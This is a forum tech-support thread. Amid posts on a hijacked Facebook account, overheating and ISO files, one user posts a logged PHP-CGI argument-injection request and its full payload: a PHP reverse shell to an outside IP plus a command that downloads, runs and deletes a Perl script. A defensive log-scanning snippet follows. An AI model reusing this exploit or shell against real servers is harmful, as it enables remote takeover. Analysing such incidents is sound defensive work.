Moća Posted August 29, 2014

Deleted it, checked the disk via cmd, and it says everything is fine, no bad sectors, so I breathed a sigh of relief on that front. But I'll have to do a reinstall later.

katamaran Posted August 29, 2014

Change the password first. Then go to settings and delete all the applications. Question: does she have a Facebook icon on the desktop, does she have those various toolbars, Facebook instant messenger or something like that?

New developments. Deleting one of the applications stopped the damn thing from spamming that link, but it keeps adding her to groups even after all the applications were deleted. The activity log just shows "was added to random group by" some guy. As far as I can see, only friends can add you to groups, and these guys aren't her friends. I'm totally confused. Maybe it somehow friends them and then unfriends them after the group add. But again, how the hell? She hasn't even logged in to Facebook in the last 24 hours, so that's not a necessary condition for adding her to groups. All some idiotic groups from New Zealand. Mostly car-related.

Edited August 29, 2014 by katamaran

maheem Posted August 30, 2014

YouTube shuts down my computer after about 15 minutes?! Does anyone have an idea what could be going on? Overheating of some kind, I assume?

Edit: it's a desktop.

Edited August 30, 2014 by maheem

renne Posted August 30, 2014

Overheating, clean the fan on the CPU.

mei Posted August 31, 2014

My HTTP server at home got attacked with this:

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

which decodes to this:

POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1

This is the POST data, from my log:

2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] <?php
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] set_time_limit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $ip = '91.121.105.21';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $port = 22;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $chunk_size = 1400;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $write_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $error_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; wget 208.85.177.238/speedtest/.a/hb/php01 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $debug = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (function_exists('pcntl_fork')) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $pid = pcntl_fork();
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't fork");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (posix_setsid() == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("Error: Can't setsid()");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 1;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } else {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("WARNING: Failed to daemonise.");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] chdir("/");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] umask(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $sock = fsockopen($ip, $port, $errno, $errstr, 30);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$sock) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("$errstr ($errno)");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $descriptorspec = array(
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 0 => array("pipe", "r"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 1 => array("pipe", "w"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 2 => array("pipe", "w")
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] );
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $process = proc_open($shell, $descriptorspec, $pipes);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!is_resource($process)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't spawn shell");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[0], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[1], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[2], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($sock, 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] while (1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($sock)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell connection terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($pipes[1])) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell process terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $read_a = array($sock, $pipes[1], $pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($sock, $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($sock, $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($pipes[0], $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[1], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[1], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[2], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[2], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($sock);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[0]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[1]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] proc_close($process);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] function printit ($string) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$daemon) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] print "$string
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ";
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ?>

What do I do now, i.e. what should I check?

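Added example, not part of any post in this thread: a log check for the request shape quoted above. It relies on the CGI rule that a query string with no unencoded "=" is passed to the program as command-line arguments; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

REQUEST_RE = re.compile(r"^[A-Z]+ (?P<target>\S+) HTTP/\d\.\d$")

# Constructed sample request lines. The second is a shortened form of the
# request quoted in the post above; the others are invented for contrast.
SAMPLE_REQUESTS = [
    "GET /index.php?id=42&sort=-date HTTP/1.1",
    "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63"
    "%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F"
    "%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1",
    "GET /cgi-bin/php.cgi?-n HTTP/1.1",
    "GET /docs?php+manual HTTP/1.1",
]


def injected_options(request_line):
    """Return the command-line options hidden in the query string, or []."""
    m = REQUEST_RE.match(request_line.strip())
    if not m or "?" not in m.group("target"):
        return []
    raw_query = m.group("target").split("?", 1)[1]
    # CGI rule (RFC 3875, section 4.4): a query string with no unencoded '='
    # is split on '+' and handed to the program as command-line arguments.
    # '%3D' is an encoded '=', so it does not switch this behaviour off.
    if "=" in raw_query:
        return []
    args = [unquote(part) for part in raw_query.split("+") if part]
    options, i = [], 0
    while i < len(args):
        if args[i] == "-d" and i + 1 < len(args):
            options.append("-d " + args[i + 1])  # ini override: -d name=value
            i += 2
        else:
            if args[i].startswith("-"):
                options.append(args[i])
            i += 1
    return options


def scan(request_lines):
    """Return (request_line, options) for each request that injects options."""
    hits = [(line, injected_options(line)) for line in request_lines]
    return [(line, opts) for line, opts in hits if opts]


if __name__ == "__main__":
    for line, opts in scan(SAMPLE_REQUESTS):
        print(line.split("?", 1)[0], "->", opts)
```

Matching on the decoded arguments rather than on literal strings is what catches the fully percent-encoded form seen in the log.
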
djili Posted August 31, 2014

Maybe it's just a bot; have a look at what these people say, and the related questions.

http://stackoverflow.com/questions/20576530/is-my-site-being-attacked-suhosin-simulation-very-strange-activity-in-ip-log
http://stackoverflow.com/questions/18008646/can-anyone-explain-this-php-code-injection-attack-to-me

Edited August 31, 2014 by djili

katamaran Posted August 31, 2014

Continuing the investigation into my sister's socializing with New Zealanders.

The whole story starts with liking some clip on one of our local, idiotic and above all "seems legit" pages with video clips. I'd rather not link that garbage of a page... There my brother-in-law, using her account, liked some video in order to watch it, then supposedly remembered halfway through that we had told him not to do that, and supposedly gave up. Anyway, that's when "likes a kretenski video on kretenskisajt.com" shows up for her, and after that the adding to NZ groups begins, along with the spamming of "WATCH MOVIES FREE AND ENJOY nekisajtzastrimovanjefilmova.info".

By killing the applications I stopped the spamming, but she still ends up in groups. Only now at a reduced rate of about two a day. I deleted all her applications and games and even turned off the application platform, but nothing helps.

Edit: when I googled what she was spamming, more of our people who post it turn up, so I'm sure that page is the cause.

Edited August 31, 2014 by katamaran

ToniAdams Posted August 31, 2014

Downloaded something from kioks, and now in that folder I have, among other things, 5 ISO files of 200-500 MB. What do I do now?

wall Posted August 31, 2014

"Downloaded something from kioks, and now in that folder I have, among other things, 5 ISO files of 200-500 MB. What do I do now?"

Burn them to CD.

maheem Posted August 31, 2014

"Overheating, clean the fan on the CPU."

Thanks renne. I'll do that. It works OK today, but it looks like it's about time for its retirement.

wall Posted August 31, 2014

"Burn them to CD."

Edit: And if you don't need them on CDs, you can unpack them on disk... I don't know what it is...

katamaran Posted August 31, 2014

"Burn them to CD."

so 19th century :) You install a virtual drive and just mount it. You load the ISO file and the computer behaves as if you had inserted a disc with that data.

wall Posted August 31, 2014

"so 19th century :) You install a virtual drive and just mount it. You load the ISO file and the computer behaves as if you had inserted a disc with that data."

:) Maybe he needs it that way.

Töölönlahti Posted August 31, 2014

"What do I do now"

I can't read the code from my phone right now, but definitely update PHP and don't keep the interpreter in /cgi/bin/ any more.

ToniAdams Posted August 31, 2014

"so 19th century :) You install a virtual drive and just mount it. You load the ISO file and the computer behaves as if you had inserted a disc with that data."

Wait, do I load all 5, or is each one separate?